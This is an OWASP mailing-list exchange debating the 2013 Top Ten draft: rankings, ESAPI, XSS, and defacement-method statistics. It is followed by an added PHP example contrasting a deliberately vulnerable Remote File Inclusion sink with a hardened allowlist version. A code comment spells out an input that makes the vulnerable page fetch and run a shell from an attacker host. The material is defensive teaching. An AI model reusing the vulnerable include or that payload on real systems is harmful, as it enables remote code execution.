[Owasp-topten] RC1 comments

Abbas Naderi abbas.naderi at owasp.org
Sun Feb 17 14:31:31 UTC 2013

Great comments, I have added something to each of them:
On 29 Bahman 1391 (17 February 2013), at 17:45, "Paweł Krawczyk" <pawel.krawczyk at hush.com> wrote:

> Several comments to the RC1 draft of proposed OWASP Top 10 2013 version:
> The rank seems to be highly impacted by vulnerability prevalence, which is in turn based on data provided by a number of vendors. The question is: how much are vendor-observed potential vulnerabilities related to vulnerabilities being actively exploited in the wild? As this is a rather complex topic, I'm moving the discussion to the bottom of these general comments.
This is something of note, but it's always been like this. It's a matter of the OWASP community, as world security experts, agreeing on these, not just raw data getting processed.
> Wording - we should probably give this to someone unrelated to security for proofreading. We should really pay attention to the readability of the text - sentences like "application functions related to authentication and session management are often not implemented correctly" (page 7) can be significantly simplified with little loss of formal correctness. Statements like "many web applications" or "virtually all applications" just inflate text volume without really bringing information value.
Great, would someone step up for this? I'm not very good with formal English.
> OWASP ESAPI is recommended in almost every "How do I prevent" section, but ESAPI really only exists for Java, so in the case of other popular environments we're sending people nowhere. We should reference Cheat Sheets, as these in turn frequently reference specific solutions on specific platforms.
100% agreed. ESAPI is a dead cause (for now) and referring to it is not so good. We're filling in its holes for PHP in the OWASP PHP Security project, with lots of different pages. Same goes for others.
> A2 Broken Authentication and Session Management - it has a very high rank, but how frequently is this actually being used to compromise websites and users?
> Section header "Am I Vulnerable to Hijacking?" - hijacking of what?
Of course session hijacking; back to your 2nd comment.
> Scenario #3 in Example attack scenarios - this has little to do with session and authentication.
> A3 Cross-Site Scripting (XSS) - same as above. It's easy to spot and very frequent in applications, but it doesn't deserve such a high rank.
Actually it does. I'm a known hacker and XSS is always the second choice.
> A5 Security Misconfiguration - this seems to be a catch-all category, but I believe it's fully justified and should probably have a higher rank, taking into account how frequently it's used to compromise sites.
> A7- rename to "Broken Access Level Controls" or something like that.
As I suggested earlier, this has to be mixed with A4, as insufficient access control. We're really forgetting that security is mostly Authentication and Authorization, and authorization is so undermined on the Web.
> A9 rename to "Infrastructure and Server Vulnerabilities"
Why??
> Not sure which category would catch Remote File Inclusion, which still seems to be the most popular way of compromising websites. Would it go under A1 Injection?

RFI is not number one. Since 2007, 80% of flawed websites are immune to RFI.

> Now going back to the vulnerability prevalence - my comment above is based on the observation that the severity of vulnerabilities reported by vendors, especially based on automated scans, is not always relevant to the actual chances of them being exploited in the wild. Real-world intrusion data is not very available, which makes statistical analysis difficult, but there are still some hints out there. I have recently been working on a research project that focused on that topic and analysed ~300k website defacement reports (courtesy of Zone-H). The distribution of methods was as follows:
>   File Inclusion 36.884%
>   SQL Injection 13.021%
>   known vulnerability (i.e. unpatched system) 9.777%
>   undisclosed (new) vulnerability 6.875%
>   Other Web Application bug 6.264%
>   Other Server intrusion 5.094%
>   configuration / admin. mistake 3.187%
>   Web Server intrusion 2.739%
>   URL Poisoning 2.728%
>   brute force attack 2.605%
>   Remote administrative panel access through bruteforcing 1.466%
>   Web Server external module intrusion 1.424%
>   SSH Server intrusion 1.002%
>   Shares misconfiguration 0.999%
>   FTP Server intrusion 0.942%
>   Telnet Server intrusion 0.808%
>   Attack against the administrator/user (password stealing/sniffing) 0.750%
>   social engineering 0.740%
>   RPC Server intrusion 0.595%
>   Mail Server intrusion 0.454%
>   Rerouting after attacking the Firewall 0.378%
>   Rerouting after attacking the Router 0.283%
>   Remote service password bruteforce 0.223%
>   Cross-Site Scripting 0.168%
>   Remote service password guessing 0.144%
>   DNS attack through cache poisoning 0.121%
>   DNS attack through social engineering 0.121%
>   Access credentials through Man In the Middle attack 0.100%
>   Remote administrative panel access through password guessing 0.071%
>   Remote administrative panel access through social engineering 0.037%
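The Remote File Inclusion pattern the two messages above argue over, shown as an added example that is not part of either message: the vulnerable PHP include sink next to an allowlisted replacement. The `pages/` directory, the module names and the function names are assumptions made for the illustration, not code from the OWASP PHP Security project.

```php
<?php
// Added example (not from the mailing-list thread). Hypothetical application
// whose page modules live under ./pages/ and are selected by ?page=...

// VULNERABLE: the request parameter flows straight into include(), the same
// "untrusted input reaches an interpreter" shape as the A1 Injection entries.
// With allow_url_include=On, ?page=http://attacker.example/shell pulls and
// executes remote code; with it Off, the same sink still serves local file
// inclusion of anything the appended suffix allows.
function render_page_vulnerable(string $page): void
{
    include $page . '.php';
}

// HARDENED: the user never supplies a path. The parameter is only a key into
// a fixed allowlist, and the resolved file must lie under the modules directory.
const PAGE_MODULES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

function resolve_page(string $page, string $baseDir): ?string
{
    if (!array_key_exists($page, PAGE_MODULES)) {
        return null;                     // unknown key: reject, never guess
    }
    $base   = realpath($baseDir);
    $target = realpath($baseDir . DIRECTORY_SEPARATOR . PAGE_MODULES[$page]);
    // realpath() returns false for URLs, stream wrappers (php://filter, data:)
    // and missing files, so none of them can come back from here.
    if ($base === false || $target === false
        || strncmp($target, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;                     // resolved outside the modules directory
    }
    return $target;
}

function render_page_hardened(string $page, string $baseDir): void
{
    $file = resolve_page($page, $baseDir);
    if ($file === null) {
        http_response_code(404);
        echo 'Page not found';
        return;
    }
    include $file;
}

// Usage (constructed): the page key comes from the query string.
$page = isset($_GET['page']) ? (string) $_GET['page'] : 'home';
render_page_hardened($page, __DIR__ . '/pages');
```

The allowlist is the actual fix; the `realpath()` prefix check is defence in depth should someone later make `PAGE_MODULES` data-driven. Keeping `allow_url_include=Off` (the default since PHP 5.2) removes the remote variant, which is the configuration change behind the claim above that most sites are now immune to RFI, but it does nothing for local inclusion, so the sink itself has to be fixed.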
